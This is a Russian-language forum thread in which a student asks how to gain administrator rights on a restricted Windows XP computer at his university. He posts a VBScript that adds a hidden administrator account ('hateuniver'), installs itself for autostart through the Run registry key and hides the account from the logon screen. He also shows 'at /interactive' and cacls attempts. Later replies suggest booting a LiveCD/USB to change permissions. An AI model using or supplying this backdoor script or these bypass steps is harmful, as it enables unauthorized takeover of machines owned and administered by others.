WinXP получаем права админа
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
WinXP получаем права админа - 2012-03-21 13:48:12.830000
|
|
|
Entrery
Сообщений: 94
Оценки: 0
Присоединился: 2008-10-19 15:38:27.410000
|
Знаю что тема не нова, на хакере уже как минимум несколько раз поднималась, но после прочтения ни один из вариантов не подошел. гугл тоже не помог, поэтому просьба не удалять тему)
Пролог (можно пропустить):
Пишу сейчас с компа родного универа, как можно догадаться без прав на какой-либо маломальский способ существования. Удручает меня мой универ - пары скучные, преподы противные, стипендия маленькая, деканат работает только в перерыве на обед, когда хочется поесть нормально, а не стоят 40 минут в очереди. Но это не беда - поесть нормально не получиться все равно, ибо цены в столовой как в неплохом ресторане. По хорошему, на нашу стипендию там можно нормально поесть раза 3… Вообщем ввиду такой прискорбной ситуации, сижу я в библиотеке, пробиваю совершенно ненужную пару уравнений математической физике - ибо шел я учиться на программиста, а универ старательно делает из меня математика. И вздумалось мне заняться наконец-то саморазвитием. Поставил себе цель взломать этот милый кусочек железа - моего хорошего друга, чей мозг захавал админ, забрав какие либо права доступа.
Ситуэйшен:
Имеем Windows XP SP3 в которой уже запаяна уязвимость с повышением прав до админа.
.vbs:
Set s=CreateObject("Wsсriрt.Shell")
s.run"C:\windows\system32\net.exe user hateuniver qwerty /add", True
s.run"C:\windows\system32\net.exe localgroup Администраторы hateuniver /add", True
Set fso=CreateObject("sсriрting.FileSystemObject")
Set file=fso.GetFile(Wsсriрt.sсriрtFullName)
file.Copy("C:/fuck_admin.vbs")
Set file2=fso.GetFile("C:/fuck_admin.vbs")
file2.Attributes=+2
s.RegWrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W indows\CurrentVersion\Run\fuck_admin","C:/fuck_adm in.vbs"
s.RegWrite"HKEY_LOCAL_MACHINE\SOFTWARE\MIcrosoft\W indows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t\hateuniver",0,"REG_DWORD"
"Ошибка при выполнение сервера сценариев Windows. (Невозможно открыть данную программу из-за политики применения программного обеспечения. За дополнительной информацией обратитесь к системному администратору или откройте "Просмотр событий".)
cmd:
at <time> /interactive c:\windows\system32\cmd.exe
отказано в доступе
.bat: (в это я вообще не вникал, наткнулся в гугле, и просто выполнил)
cd \noexec
copy \WINDOWS\system32\notepad.exe .
C:\noexec>cacls notepad.exe
C:\noexec\notepad.exe BUILTIN\Users:(DENY)(Special access:)
FILE_EXECUTE
BUILTIN\Users:(DENY)(Special access:)
WRITE_DAC
WRITE_OWNER
BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
WINXP01\test:F
BUILTIN\Users:R
C:\noexec>notepad.exe
Access denided.
C:\noexec>cacls.exe notepad.exe /G test:F
C:\noexec>cacls notepad.exe
C:\noexec\notepad.exe WINXP01\test:F
C:\noexec>notepad.exe
невозможно открыть данную программу из-за политики ограничения применения программного обеспечения. За дополнительной информацией обратитесь к системному администратору или откройте "Просмотр событий".
Вообщем начинается следующая пара, пора идти. Очень надеюсь на ваши советы в том как еще можно подступиться к делу. Заранее всем спасибо)
|
|
|
|
|
RE: WinXP получаем права админа - 2012-03-21 18:56:17.096666
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
quote:
минимум несколько раз поднималась
минимум раз 200
|
|
|
|
|
RE: WinXP получаем права админа - 2012-03-21 20:04:01.623333
|
|
|
Entrery
Сообщений: 94
Оценки: 0
Присоединился: 2008-10-19 15:38:27.410000
|
угу, и я просмотрев большинство решение своей ситуации не нашел( иначе бы не стал писать)
|
|
|
|
|
RE: WinXP получаем права админа - 2012-03-22 07:09:55.300000
|
|
|
zzsnn
Сообщений: 7459
Оценки: 680
Присоединился: 2007-09-25 07:17:14.240000
|
А нет решений. Без знаний опыта и умения у тебя ничего не выйдет.
Для начала взломай свой домашний комп. А потом возьмись за сетевой.
Кстати сейчас институские сетки одни из самых защищённых. Порой круче чем в банках. Ибо эти сетки в день по сотне раз пытаются взломать, а банки раз в неделю. Админы института работают постоянно в режиме борьбы и латания дыр.
|
|
|
|
|
RE: WinXP получаем права админа - 2012-03-22 14:23:54.683333
|
|
|
Entrery
Сообщений: 94
Оценки: 0
Присоединился: 2008-10-19 15:38:27.410000
|
хорошо, попробую свой домашний для начала, но тогда подскажи хоть с чгео начать - ккие еще способы попробовать? что лучше - пытаться вытянуть проли, или добавить свою учетку с админсими, словом куда ткнуться?)
|
|
|
|
|
RE: WinXP получаем права админа - 2012-03-22 15:11:50.450000
|
|
|
Ltonid
Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
|
Начни с того что:
1) Создай две учетки: админа и юзвера. Поставь пароль на админа.
2) Ограничь юзвера по полной: от редактора реестра, до перезагрузки
3) Прочитай что такое права доступа к файлам, папкам, дискам, веткам реестра - поиграйся с ними.
4) Как только 2 и 3 пункт будут осознаны приступай к ломанию. Постарайся из юзвера получить права админа или системы не х используя внешних приблуд. При правильной настройке это маловероятно.
5) Если сможешь доказать себе, что выполнение 4 пункта не возможно. Приступай к 5.
Качаешь LiveCD или LiveUSB и стараешься повысить свои права.
6) Если этот вариант кажется дико скучным, то используя учетку админа повышаешь права юзвера не внося изменений в ранее созданные правила и настройки.
Как все это проделать? Качаешь книгу из серии "Windows для чайников" и читаешь от корки до корки. Там много написано про взвлом, но только между строк….
|
|
|
|
|
RE: WinXP получаем права админа - 2012-03-23 17:52:26.343333
|
|
|
Entrery
Сообщений: 94
Оценки: 0
Присоединился: 2008-10-19 15:38:27.410000
|
Ltonid очень информативно, спасибо. особенно пункт про livecd/usb понравился, вставил так какую-нибудь юньку, под рутом права на файлы поменял и дело в шляпе. п1) -п5) пропущены ввиду очевидности, п6) можно поподробнее? допустим с лайфюзб под рутом с любой линухи. но как из под нее править винду и главное что именно там править?
ПЫ.СЫ.: ни в одной книге из серии "Windows для чайников" нужного материала не найти даже между строк, ибо на то он и для чайников.
|
|
|
|
|
RE: WinXP получаем права админа - 2012-03-23 18:20:31.073333
|
|
|
Ltonid
Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
|
Вот ты даже не читал ещё и говоришь. Через линух будет сложновато работать с этой частью винды, ибо права и прочая лабуда не хранятся в явном виде.
Далее можешь углубится в главу "Реестр Windows"
|
|
|
|
|
RE: WinXP получаем права админа - 2012-03-23 18:28:52.430000
|
|
|
Entrery
Сообщений: 94
Оценки: 0
Присоединился: 2008-10-19 15:38:27.410000
|
Ltonid хорошо, спасибо)
|
|
|
|
|
RE: WinXP получаем права админа - 2012-03-24 22:12:13.763333
|
|
|
RE.saratova
Сообщений: 6
Оценки: 0
Присоединился: 2012-03-24 22:05:42.113333
|
а у меня первый скрипт не запускается че та(((
|
|
|
|
|
RE: WinXP получаем права админа - 2012-03-28 09:00:07.476666
|
|
|
araqon.mmc
Сообщений: 4
Оценки: 0
Присоединился: 2012-03-28 08:56:41.480000
|
у меня тоже
|
|
|
|
|
|
